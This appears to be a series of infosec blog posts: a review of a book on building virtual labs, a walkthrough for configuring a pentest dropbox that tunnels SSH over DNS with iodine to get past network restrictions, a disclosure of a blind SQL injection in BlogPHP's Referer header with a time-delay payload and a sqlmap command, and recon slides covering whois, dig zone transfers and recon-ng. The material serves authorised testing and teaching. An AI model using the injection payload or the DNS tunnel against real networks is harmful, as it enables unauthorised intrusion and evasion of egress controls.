Book review – Building Virtual Machine Labs: A Hands-On Guide

AKA: How to break into IT/infosec

I’ve worked in IT for over a decade, and went through that struggle to break into an IT job, and later an infosec job. Everyone that is trying to break into IT or infosec knows the struggle of not being able to get the job because you don’t have experience and can’t get experience because you don’t have the job. There’s ONE reliable way to break through, and that’s to build a home lab and learn the skills on your own time. This allows you to be able to enthusiastically and truthfully answer interview questions, or show competence on the job.

Every interview I’ve done on either side of the table has included the question “tell me about your home lab”. If you’re lacking experience but you can enthusiastically tell me about how you’ve setup a virtual lab on your laptop or spare hardware, configured Active Directory, virtual pfsense firewall, SIEM, Apache/IIS, and hacked it and secured it, then you’ll win points during the interview.

Once you’ve broken into IT or infosec you can’t rest for long. It’s a lifelong learning process and if you don’t continue to learn and do in your personal lab then you’ll likely get left behind and become irrelevant. Yes, a home lab is a must even for seasoned professionals.

This is the book I wish I’d had many years ago when I was googling all of this info and learning it the hard way. The author does an outstanding job of explaining the underlying hardware and software needed for a virtual lab, and walking the reader through setting it all up step by step. There are multiple free hypervisor options to run your lab, and step by step instructions are included for each one.

The books starts out talking about prerequisite knowledge before moving into hardware considerations. Although you can build a lab on your laptop using free hypervisors, this sections gets into hardware choices for professional labs as well as covering how to make the most of the hardware you have.

Next it moves into virtual networks which can be confusing for newcomers trying to understand the difference between NAT, Bridged, and Host-Only adapters and when each choice makes sense to use in your lab. Virtual labs frequently run insecure software that you wouldn’t want to expose to the internet or untrusted network, so you’ll need to understand how to use virtual switches and vNIC’s to segment your network.

The next section is a Hypervisor guide and covers how to setup each, including VMware Fusion/ESXi/Workstation Pro, VirtualBox, and Hyper-V. Then the book gets into step by step instructions on configuring your virtual machines, including a pfSense firewall, Kali Linux, SIEM, IPS, and Metasploitable2. Once you have your lab configured, you’ll need to know how to manage the hosts. This is one of the areas where the book really goes above and beyond by explaining things like persistent static routes, generating ssh keys, helpful commands, and remote access with guides for each OS. Every infosec interview I’ve been in has asked questions about SIEMs. The book covers how to install, configure, and manage the Splunk SIEM which is one of the more popular SIEMs in use. The book ends on a more advanced note, covering malware analysis, pentesting, and IT/OPs lab configurations.

Every time someone has asked me how to break into IT or infosec I’ve always said that you need to get busy in your home lab to build your experience, knowing that building that lab is a pretty big challenge for newcomers. Now you have an excellent book that will hold your hand step by step through the process.

I don’t often buy books because I have a Safari Books Online membership and can read an unlimited number of books online on any device, but this book was well worth the cost and I learned a few things from it even after so many years in the game.

Building Virtual Machine Labs: A Hands-On Guide

Configure pentest dropbox DNS tunneling

I work for a very large corporation that has many subsidiaries and they are buying up smaller companies. We need to send out a dropbox (Raspberry Pi or Intel NUC) that we could have a remote office plug into the network for internal pentesting and it establishes a ssh tunnel to our server regardless of network restrictions in the remote office.

Initially we used TAP from Trustedsec. TAP first tries to connect to a URL to retrieve a ‘commands.txt’ file that contains commands to run. If you don’t configure that, or if fails to connect to your http/https/ftp server URL, TAP will fail over to ssh and establish an ssh tunnel. We sometimes experienced issues with the dropbox connecting out from networks that required a proxy server and denied ssh outbound.

My solution was to configure the dropbox to tunnel over DNS if the device is unable to establish a connection over TAP.

I’ll leave configuring TAP up to the reader as another pentester installed it and I installed iodine. The TAP github page setup instructions seem easy enough to understand.

Steps to reproduce DNS tunneling using iodine:

Configure DNS:
See the iodine setup guide: http://dev.kryo.se/iodine/wiki/HowtoSetup.
I thought I had missed something when it didn’t work the same day. After waiting for DNS changes to propagate I tried again the following day and it worked. The setup guide has a link to a tunnel tester in the Troubleshooting section.

Download iodine and install. Same steps on client and server:

git clone https://github.com/yarrick/iodine
cd iodine
make
sudo make install

Add iptables rules on your server to allow DNS connections.

sudo iptables -I INPUT 1 -p tcp --dport 53 -j ACCEPT
sudo iptables -I INPUT 2 -p udp --dport 53 -j ACCEPT

Run iodined on the server:

sudo ./iodined -f -c <tunnel IP address> <domain.name.com>

After entering your password for sudo, you’ll be prompted for a password for the tunnel connection. You can add the ‘-P <password>’ option on both client and server to script/automate the connection and avoid being prompted to enter one.
The ‘-f’ option was used to make it run in the foreground for troubleshooting and isn’t necessary once you have it working.
Note that the ‘-c’ option was critical to getting this to work.
The tunnel IP address is the local tunnel IP of your server. It isn’t the actual server IP address, it should be something that isn’t likely to be used on the LAN at either end. I used 10.0.0.1, and the dropbox client automatically received a tunnel IP address of 10.0.0.2. (netmask 255.255.255.224)

Run iodine on the client:

sudo iodine -f -r -P <password> <domain.name.com>

After ssh into the dropbox from my server over the DNS tunnel I was surprised to see that there wasn’t much lag and the connection was usable. I expected the connection to be much slower.

Configure the dropbox to check for a ssh connection over TAP after startup, and if none then start iodine to tunnel over DNS.

Edit: After posting a link to my article on Reddit and seeing some of the responses I realized that some don’t understand how DNS tunneling works and assume that if they block port 53 outbound and only allow network clients to use their internal DNS server then they are blocking DNS tunneling.

Here’s a good read to understand how DNS tunneling works and how to detect it. (I recommend Bro for DNS traffic analysis.) https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152

Two relevant sections of the paper that are critical to understanding how DNS tunneling works:

With this hierarchical system a given domain owner can define the authoritative servers for their domain. This means that they are in control of the ultimate destination host for DNS queries for their domain. In a typical enterprise, endpoints do not make DNS requests directly to the internet. They have internal DNS servers that provide DNS services to an endpoint. However, given that DNS will forward their requests until the authoritative name server is contacted, an attacker with access on an internal endpoint can leverage the enterprise‘s DNS infrastructure for DNS tunneling to a domain that they control.

The last core technique is to encode data in DNS payloads. This is an area where the specifics of each utility vary widely. From a high level simplified point of view, the client wants to send data to server. It will encode that data in the DNS payload. For example the client could send an ‗A‘ record request where the data is encoded the in host
name: MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.example.com. The server could respond with an answer as a CNAME response:
NVWW2IDPOZQWY5DJNZSQ.t.example.com. In this way any data can be encoded
and sent to the server. The server can also respond with any data. If there is a need for the server to initiate a communication, it cannot be done directly. Clients do not have a service listening for DNS requests and are typically behind a firewall. Server initiated
communication can however be accomplished by having the client regularly poll the server. Then, if the server has data for the client it can send it as a response to the polling requests.

My first CVE-2016-1000329 in BlogPHP

While the affected software, BlogPHP isn’t in widespread use (at least I hope not!) and it’s outdated and abandoned by the developer, this find means a lot to me because it’s my first CVE. This vulnerability has also been overlooked by many people for years, including those that worked on the Breach 2.1 vulnhub challenge. Breach 2.1 is a boot2root/CTF challenge which attempts to showcase a real-world scenario penetration test. My full write-up of my pentest of Breach can be found here.

I used a XSS exploit to steal the admin’s cookie which should have allowed me to login as admin but it didn’t work. Knowing that the admin user was logging in to a blog hosted on the same host I decided to take a look at the HTTP headers to see if I needed to change something in the “Referer” field in order for the stolen cookie to allow me to login as admin. I initially tried changing it to localhost and 127.0.0.1 with no success.

While fuzzing the HTTP header “Referer” field I discovered a blind SQL injection. Using an input of ‘+(select*from(select(sleep(20)))a)+’ including single quotes results in a delay of 20 seconds to page render. I was able to further exploit the vulnerability using sqlmap. I saved the request from Burp Suite to a text file and exploited it with sqlmap using “sqlmap -r req.txt –level=5 –risk=3”.

I submitted my CVE request through Mitre who notified me that “The Distributed Weakness Filing (DWF) Project is the CVE Numbering
Authority (CNA) currently responsible for assigning CVE IDs to open
source software vulnerabilities that are outside of the current CVE
coverage goals listed at
http://cve.mitre.org/cve/data_sources_product_coverage.html.”

CVE listing for CVE-2016-1000329 on DWF.

Passive Information Gathering

I prepared this presentation for the 757 White Hat Hackers meeting on 10/26 where I presented on Passive Information Gathering. Passive Information Gathering is simply reconnaissance methods that don’t touch the target and leave any traces of your presence.

Topics:

  • Whois
  • Dig
  • Recon-ng
  • Theharvester
  • Network-tools.com
  • Netcraft Toolbar
  • SiteDigger
  • Shodan
  • Maltego

Whois

Whois is usually installed in all Linux systems and returns the following domain information:

Registrar: The company/organization that registered the domain on behalf of the domain’s owner.
Name Servers: The servers that control the domain’s DNS.
Creation Date: The date the domain was originally registered.
Expiration Date: When the domain will expire.
Contacts: Publicly accessible information, required by registrars

Usage: “whois <domainName>”

root@DESKTOP-7ETQJM7:~# whois nasa.gov
% DOTGOV WHOIS Server ready
 Domain Name: NASA.GOV
 Status: ACTIVE

>>> Last update of whois database: 2016-10-28T17:55:42Z <<<
Please be advised that this whois server only contains information pertaining
to the .GOV domain. For information for other domains please use the whois
server at RS.INTERNIC.NET.
root@DESKTOP-7ETQJM7:~# whois yahoo.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

 Server Name: YAHOO.COM.ACCUTAXSERVICES.COM
 IP Address: 98.136.43.32
 IP Address: 66.196.84.168
 Registrar: WILD WEST DOMAINS, LLC
 Whois Server: whois.wildwestdomains.com
 Referral URL: http://www.wildwestdomains.com


 Server Name: YAHOO.COM.ANGRYPIRATES.COM
 IP Address: 8.8.8.8
 Registrar: NAME.COM, INC.
 Whois Server: whois.name.com
 Referral URL: http://www.name.com


 Server Name: YAHOO.COM.AU
 Registrar: WILD WEST DOMAINS, LLC
 Whois Server: whois.wildwestdomains.com
 Referral URL: http://www.wildwestdomains.com


 Server Name: YAHOO.COM.BGPETERSON.COM
 IP Address: 66.218.71.205
 Registrar: TUCOWS DOMAINS INC.
 Whois Server: whois.tucows.com
 Referral URL: http://www.tucowsdomains.com


 Server Name: YAHOO.COM.BIGROCK.IN
 Registrar: BIGROCK SOLUTIONS LIMITED
 Whois Server: Whois.bigrock.com
 Referral URL: http://www.bigrock.com


 Server Name: YAHOO.COM.BR
 Registrar: ENOM, INC.
 Whois Server: whois.enom.com
 Referral URL: http://www.enom.com


 Server Name: YAHOO.COM.CN
 Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
 Whois Server: whois.dns.com.cn
 Referral URL: http://www.dns.com.cn


 Server Name: YAHOO.COM.DALLARIVA.COM
 IP Address: 66.218.71.205
 Registrar: DOMAIN.COM, LLC
 Whois Server: whois.domain.com
 Referral URL: http://www.domain.com


 Server Name: YAHOO.COM.ELPOV.COM
 IP Address: 66.21.71.205
 Registrar: TIERRANET INC. D/B/A DOMAINDISCOVER
 Whois Server: whois.domaindiscover.com
 Referral URL: http://www.domaindiscover.com


 Server Name: YAHOO.COM.HACKED.BY.JAPTRON.ES
 Registrar: GODADDY.COM, LLC
 Whois Server: whois.godaddy.com
 Referral URL: http://www.godaddy.com


 Server Name: YAHOO.COM.HK
 Registrar: ENOM, INC.
 Whois Server: whois.enom.com
 Referral URL: http://www.enom.com


 Server Name: YAHOO.COM.IS.N0T.AS.1337.AS.SEARCH.GULLI.COM
 IP Address: 80.190.192.24
 Registrar: COREHUB, S.R.L.
 Whois Server: whois.corehub.net
 Referral URL: http://corehub.net


 Server Name: YAHOO.COM.JTNELECTRIC.COM
 IP Address: 66.218.71.205
 IP Address: 216.109.116.20
 Registrar: GODADDY.COM, LLC
 Whois Server: whois.godaddy.com
 Referral URL: http://www.godaddy.com


 Server Name: YAHOO.COM.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
 IP Address: 203.36.226.2
 Registrar: INSTRA CORPORATION PTY, LTD.
 Whois Server: whois.instra.net
 Referral URL: http://www.instra.com


 Server Name: YAHOO.COM.MX
 Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 Whois Server: whois.PublicDomainRegistry.com
 Referral URL: http://www.publicdomainregistry.com


 Server Name: YAHOO.COM.MY
 Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 Whois Server: whois.PublicDomainRegistry.com
 Referral URL: http://www.publicdomainregistry.com


 Server Name: YAHOO.COM.SG
 Registrar: DOTSTER, INC.
 Whois Server: whois.dotster.com
 Referral URL: http://www.dotster.com


 Server Name: YAHOO.COM.TW
 Registrar: GODADDY.COM, LLC
 Whois Server: whois.godaddy.com
 Referral URL: http://www.godaddy.com


 Server Name: YAHOO.COM.TWIXTEARS.COM
 IP Address: 66.218.71.205
 Registrar: DOMAIN.COM, LLC
 Whois Server: whois.domain.com
 Referral URL: http://www.domain.com


 Server Name: YAHOO.COM.VIRGINCHASSIS.COM
 IP Address: 66.218.71.205
 Registrar: DOMAIN.COM, LLC
 Whois Server: whois.domain.com
 Referral URL: http://www.domain.com


 Server Name: YAHOO.COM.VN
 Registrar: MELBOURNE IT, LTD. D/B/A INTERNET NAMES WORLDWIDE
 Whois Server: whois.melbourneit.com
 Referral URL: http://www.melbourneit.com.au


 Server Name: YAHOO.COM.ZZZZZ.GET.LAID.AT.WWW.SWINGINGCOMMUNITY.COM
 IP Address: 69.41.185.196
 Registrar: TUCOWS DOMAINS INC.
 Whois Server: whois.tucows.com
 Referral URL: http://www.tucowsdomains.com


 Server Name: YAHOO.COM.ZZZZZZ.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
 IP Address: 203.36.226.2
 Registrar: INSTRA CORPORATION PTY, LTD.
 Whois Server: whois.instra.net
 Referral URL: http://www.instra.com


 Server Name: YAHOO.COM.ZZZZZZZ.GET.ONE.MILLION.DOLLARS.AT.WWW.UNIMUNDI.COM
 IP Address: 209.126.190.70
 Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 Whois Server: whois.PublicDomainRegistry.com
 Referral URL: http://www.publicdomainregistry.com


 Domain Name: YAHOO.COM
 Registrar: MARKMONITOR INC.
 Sponsoring Registrar IANA ID: 292
 Whois Server: whois.markmonitor.com
 Referral URL: http://www.markmonitor.com
 Name Server: NS1.YAHOO.COM
 Name Server: NS2.YAHOO.COM
 Name Server: NS3.YAHOO.COM
 Name Server: NS4.YAHOO.COM
 Name Server: NS5.YAHOO.COM
 Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
 Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
 Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
 Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
 Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
 Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
 Updated Date: 26-aug-2015
 Creation Date: 18-jan-1995
 Expiration Date: 19-jan-2023

>>> Last update of whois database: Fri, 28 Oct 2016 17:56:10 GMT <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: yahoo.com
Registry Domain ID: 3643624_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-08-26T15:30:44-0700
Creation Date: 1995-01-18T00:00:00-0800
Registrar Registration Expiration Date: 2023-01-18T21:00:00-0800
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)
Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)
Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)
Registry Registrant ID:
Registrant Name: Domain Administrator
Registrant Organization: Yahoo! Inc.
Registrant Street: 701 First Avenue
Registrant City: Sunnyvale
Registrant State/Province: CA
Registrant Postal Code: 94089
Registrant Country: US
Registrant Phone: +1.4083493300
Registrant Phone Ext:
Registrant Fax: +1.4083493301
Registrant Fax Ext:
Registrant Email: domainadmin@yahoo-inc.com
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: Yahoo! Inc.
Admin Street: 701 First Avenue
Admin City: Sunnyvale
Admin State/Province: CA
Admin Postal Code: 94089
Admin Country: US
Admin Phone: +1.4083493300
Admin Phone Ext:
Admin Fax: +1.4083493301
Admin Fax Ext:
Admin Email: domainadmin@yahoo-inc.com
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: Yahoo! Inc.
Tech Street: 701 First Avenue
Tech City: Sunnyvale
Tech State/Province: CA
Tech Postal Code: 94089
Tech Country: US
Tech Phone: +1.4083493300
Tech Phone Ext:
Tech Fax: +1.4083493301
Tech Fax Ext:
Tech Email: domainadmin@yahoo-inc.com
Name Server: ns4.yahoo.com
Name Server: ns2.yahoo.com
Name Server: ns1.yahoo.com
Name Server: ns5.yahoo.com
Name Server: ns3.yahoo.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2016-10-28T10:52:20-0700 <<<

The Data in MarkMonitor.com's WHOIS database is provided by MarkMonitor.com for
information purposes, and to assist persons in obtaining information about or
related to a domain name registration record. MarkMonitor.com does not guarantee
its accuracy. By submitting a WHOIS query, you agree that you will use this Data
only for lawful purposes and that, under no circumstances will you use this Data to:
 (1) allow, enable, or otherwise support the transmission of mass unsolicited,
 commercial advertising or solicitations via e-mail (spam); or
 (2) enable high volume, automated, electronic processes that apply to
 MarkMonitor.com (or its systems).
MarkMonitor.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by this policy.

MarkMonitor is the Global Leader in Online Brand Protection.

MarkMonitor Domain Management(TM)
MarkMonitor Brand Protection(TM)
MarkMonitor AntiPiracy(TM)
MarkMonitor AntiFraud(TM)
Professional and Managed Services

Visit MarkMonitor at http://www.markmonitor.com
Contact us at +1.8007459229
In Europe, at +44.02032062220

For more information on Whois status codes, please visit
 https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en

Dig

Domain Internet Groper

Options:

root@DESKTOP-7ETQJM7:~# dig -h
Usage: dig [@global-server] [domain] [q-type] [q-class] {q-opt}
 {global-d-opt} host [@local-server] {local-d-opt}
 [ host [@local-server] {local-d-opt} [...]]
Where: domain is in the Domain Name System
 q-class is one of (in,hs,ch,...) [default: in]
 q-type is one of (a,any,mx,ns,soa,hinfo,axfr,txt,...) [default:a]
 (Use ixfr=version for type ixfr)
 q-opt is one of:
 -x dot-notation (shortcut for reverse lookups)
 -i (use IP6.INT for IPv6 reverse lookups)
 -f filename (batch mode)
 -b address[#port] (bind to source address/port)
 -p port (specify port number)
 -q name (specify query name)
 -t type (specify query type)
 -c class (specify query class)
 -k keyfile (specify tsig key file)
 -y [hmac:]name:key (specify named base64 tsig key)
 -4 (use IPv4 query transport only)
 -6 (use IPv6 query transport only)
 -m (enable memory usage debugging)
 d-opt is of the form +keyword[=value], where keyword is:
 +[no]vc (TCP mode)
 +[no]tcp (TCP mode, alternate syntax)
 +time=### (Set query timeout) [5]
 +tries=### (Set number of UDP attempts) [3]
 +retry=### (Set number of UDP retries) [2]
 +domain=### (Set default domainname)
 +bufsize=### (Set EDNS0 Max UDP packet size)
 +ndots=### (Set NDOTS value)
 +[no]edns[=###] (Set EDNS version) [0]
 +[no]search (Set whether to use searchlist)
 +[no]showsearch (Search with intermediate results)
 +[no]defname (Ditto)
 +[no]recurse (Recursive mode)
 +[no]ignore (Don't revert to TCP for TC responses.)
 +[no]fail (Don't try next server on SERVFAIL)
 +[no]besteffort (Try to parse even illegal messages)
 +[no]aaonly (Set AA flag in query (+[no]aaflag))
 +[no]adflag (Set AD flag in query)
 +[no]cdflag (Set CD flag in query)
 +[no]cl (Control display of class in records)
 +[no]cmd (Control display of command line)
 +[no]comments (Control display of comment lines)
 +[no]rrcomments (Control display of per-record comments)
 +[no]question (Control display of question)
 +[no]answer (Control display of answer)
 +[no]authority (Control display of authority)
 +[no]additional (Control display of additional)
 +[no]stats (Control display of statistics)
 +[no]short (Disable everything except short
 form of answer)
 +[no]ttlid (Control display of ttls in records)
 +[no]all (Set or clear all display flags)
 +[no]qr (Print question before sending)
 +[no]nssearch (Search all authoritative nameservers)
 +[no]identify (ID responders in short answers)
 +[no]trace (Trace delegation down from root [+dnssec])
 +[no]dnssec (Request DNSSEC records)
 +[no]nsid (Request Name Server ID)
 +[no]sigchase (Chase DNSSEC signatures)
 +trusted-key=#### (Trusted Key when chasing DNSSEC sigs)
 +[no]topdown (Do DNSSEC validation top down mode)
 +[no]split=## (Split hex/base64 fields into chunks)
 +[no]multiline (Print records in an expanded format)
 +[no]onesoa (AXFR prints only one soa record)
 +[no]keepopen (Keep the TCP socket open between queries)
 global d-opts and servers (before host name) affect all queries.
 local d-opts and servers (after host name) affect only that lookup.
 -h (print help and exit)
 -v (print version and exit)

My favorite dig option is axfr, for a zone transfer. Zone transfers are a DNS transaction used to replicate records between DNS servers. It’s rare to find a DNS server these days that allow a zone transfer, but it’s something you should check. If you succeed in performing a zone transfer, you will have all dns records for a domain.

Example: dig axfr @dns-server domain.name

Recon-ng

https://bitbucket.org/LaNMaSteR53/recon-ng

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Usage Guide for more information.
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.

If you know how to use Metasploit, you should feel right at home using recon-ng. You can even automate recon-ng using resource files like you can with Metasploit.

Some of the modules are passive, they never touch the target network, while some directly probe and can even attack the system you are targeting.

To install recon-ng in Kali, enter the command:

apt-get update && apt-get install recon-ng

At each level in recon-ng you can get help by typing the help and show commands.

[recon-ng][default] > help

Commands (type [help|?] <topic>):
---------------------------------
add Adds records to the database
back Exits the current context
delete Deletes records from the database
exit Exits the framework
help Displays this menu
keys Manages framework API keys
load Loads specified module
pdb Starts a Python Debugger session
query Queries the database
record Records commands to a resource file
reload Reloads all modules
resource Executes commands from a resource file
search Searches available modules
set Sets module options
shell Executes shell commands
show Shows various framework items
snapshots Manages workspace snapshots
spool Spools output to a file
unset Unsets module options
use Loads specified module
workspaces Manages workspaces

[recon-ng][default] > show
Shows various framework items

Usage: show [banner|companies|contacts|credentials|dashboard|domains|hosts|keys|leaks|locations|modules|netblocks|options|ports|profiles|pushpins|repositories|schema|vulnerabilities|workspaces]

Recon-ng uses the concept of workspaces to organize targets. To add a workspace, use “workspaces add <workspaceName>”. The prompt will change from “default” to display the current workspace.

[recon-ng][default] > workspaces add demo

In the new workspace, add a company and domain:

[recon-ng][demo] > add companies
company (TEXT): SANS
description (TEXT): SANS
[recon-ng][demo] > add domains
domain (TEXT): sans.org

Full list of modules:

[recon-ng][default] > show modules

 Discovery
 ---------
 discovery/info_disclosure/cache_snoop
 discovery/info_disclosure/interesting_files

 Exploitation
 ------------
 exploitation/injection/command_injector
 exploitation/injection/xpath_bruter

 Import
 ------
 import/csv_file
 import/list

 Recon
 -----
 recon/companies-contacts/bing_linkedin_cache
 recon/companies-contacts/indeed
 recon/companies-contacts/jigsaw/point_usage
 recon/companies-contacts/jigsaw/purchase_contact
 recon/companies-contacts/jigsaw/search_contacts
 recon/companies-contacts/linkedin_auth
 recon/companies-multi/github_miner
 recon/companies-multi/whois_miner
 recon/contacts-contacts/mailtester
 recon/contacts-contacts/mangle
 recon/contacts-contacts/unmangle
 recon/contacts-credentials/hibp_breach
 recon/contacts-credentials/hibp_paste
 recon/contacts-domains/migrate_contacts
 recon/contacts-profiles/fullcontact
 recon/credentials-credentials/adobe
 recon/credentials-credentials/bozocrack
 recon/credentials-credentials/hashes_org
 recon/domains-contacts/metacrawler
 recon/domains-contacts/pgp_search
 recon/domains-contacts/whois_pocs
 recon/domains-credentials/pwnedlist/account_creds
 recon/domains-credentials/pwnedlist/api_usage
 recon/domains-credentials/pwnedlist/domain_creds
 recon/domains-credentials/pwnedlist/domain_ispwned
 recon/domains-credentials/pwnedlist/leak_lookup
 recon/domains-credentials/pwnedlist/leaks_dump
 recon/domains-domains/brute_suffix
 recon/domains-hosts/bing_domain_api
 recon/domains-hosts/bing_domain_web
 recon/domains-hosts/brute_hosts
 recon/domains-hosts/builtwith
 recon/domains-hosts/certificate_transparency
 recon/domains-hosts/google_site_api
 recon/domains-hosts/google_site_web
 recon/domains-hosts/hackertarget
 recon/domains-hosts/netcraft
 recon/domains-hosts/shodan_hostname
 recon/domains-hosts/ssl_san
 recon/domains-hosts/threatcrowd
 recon/domains-hosts/vpnhunter
 recon/domains-vulnerabilities/ghdb
 recon/domains-vulnerabilities/punkspider
 recon/domains-vulnerabilities/xssed
 recon/domains-vulnerabilities/xssposed
 recon/hosts-domains/migrate_hosts
 recon/hosts-hosts/bing_ip
 recon/hosts-hosts/freegeoip
 recon/hosts-hosts/ipinfodb
 recon/hosts-hosts/resolve
 recon/hosts-hosts/reverse_resolve
 recon/hosts-hosts/ssltools
 recon/hosts-locations/migrate_hosts
 recon/hosts-ports/shodan_ip
 recon/locations-locations/geocode
 recon/locations-locations/reverse_geocode
 recon/locations-pushpins/flickr
 recon/locations-pushpins/instagram
 recon/locations-pushpins/picasa
 recon/locations-pushpins/shodan
 recon/locations-pushpins/twitter
 recon/locations-pushpins/youtube
 recon/netblocks-companies/whois_orgs
 recon/netblocks-hosts/reverse_resolve
 recon/netblocks-hosts/shodan_net
 recon/netblocks-ports/census_2012
 recon/netblocks-ports/censysio
 recon/ports-hosts/migrate_ports
 recon/profiles-contacts/dev_diver
 recon/profiles-contacts/github_users
 recon/profiles-profiles/namechk
 recon/profiles-profiles/profiler
 recon/profiles-profiles/twitter_mentioned
 recon/profiles-profiles/twitter_mentions
 recon/profiles-repositories/github_repos
 recon/repositories-profiles/github_commits
 recon/repositories-vulnerabilities/gists_search
 recon/repositories-vulnerabilities/github_dorks

 Reporting
 ---------
 reporting/csv
 reporting/html
 reporting/json
 reporting/list
 reporting/pushpin
 reporting/xlsx
 reporting/xml

Striker Security has published an excellent guide to recon-ng modules. Get it here: https://strikersecurity.com/pdfs/recon-ng-guide.pdf

Instead of viewing the full list of modules, you can search for them.

[recon-ng][demo] > search domains
[*] Searching for 'domains'...

 Recon
 -----
 recon/contacts-domains/migrate_contacts
 recon/domains-contacts/metacrawler
 recon/domains-contacts/pgp_search
 recon/domains-contacts/whois_pocs
 recon/domains-credentials/pwnedlist/account_creds
 recon/domains-credentials/pwnedlist/api_usage
 recon/domains-credentials/pwnedlist/domain_creds
 recon/domains-credentials/pwnedlist/domain_ispwned
 recon/domains-credentials/pwnedlist/leak_lookup
 recon/domains-credentials/pwnedlist/leaks_dump
 recon/domains-domains/brute_suffix
 recon/domains-hosts/bing_domain_api
 recon/domains-hosts/bing_domain_web
 recon/domains-hosts/brute_hosts
 recon/domains-hosts/builtwith
 recon/domains-hosts/certificate_transparency
 recon/domains-hosts/google_site_api
 recon/domains-hosts/google_site_web
 recon/domains-hosts/hackertarget
 recon/domains-hosts/netcraft
 recon/domains-hosts/shodan_hostname
 recon/domains-hosts/ssl_san
 recon/domains-hosts/threatcrowd
 recon/domains-hosts/vpnhunter
 recon/domains-vulnerabilities/ghdb
 recon/domains-vulnerabilities/punkspider
 recon/domains-vulnerabilities/xssed
 recon/domains-vulnerabilities/xssposed
 recon/hosts-domains/migrate_hosts

To use a module, enter “use <full path to module>”. Recon-ng offers tab completion, so you can type a partial path and hit the tab key to complete each section of the path between slashes. Once you’ve entered a module, use “show info” to find module info and required parameters.

[recon-ng][demo][shodan_hostname] > use recon/domains-hosts/bing_domain_web
[recon-ng][demo][bing_domain_web] > show info

 Name: Bing Hostname Enumerator
 Path: modules/recon/domains-hosts/bing_domain_web.py
 Author: Tim Tomes (@LaNMaSteR53)

Description:
 Harvests hosts from Bing.com by using the 'site' search operator. Updates the 'hosts' table with the
 results.

Options:
 Name Current Value Required Description
 ------ ------------- -------- -----------
 SOURCE default yes source of input (see 'show info' for details)

Source Options:
 default SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
 <string> string representing a single input
 <path> path to a file containing a list of inputs
 query <sql> database query returning one column of inputs

[recon-ng][demo][bing_domain_web] >

To start the module, enter “run”.

[recon-ng][demo][bing_domain_web] > run

--------
SANS.ORG
--------
[*] URL: https://www.bing.com/search?first=0&q=domain%3Asans.org
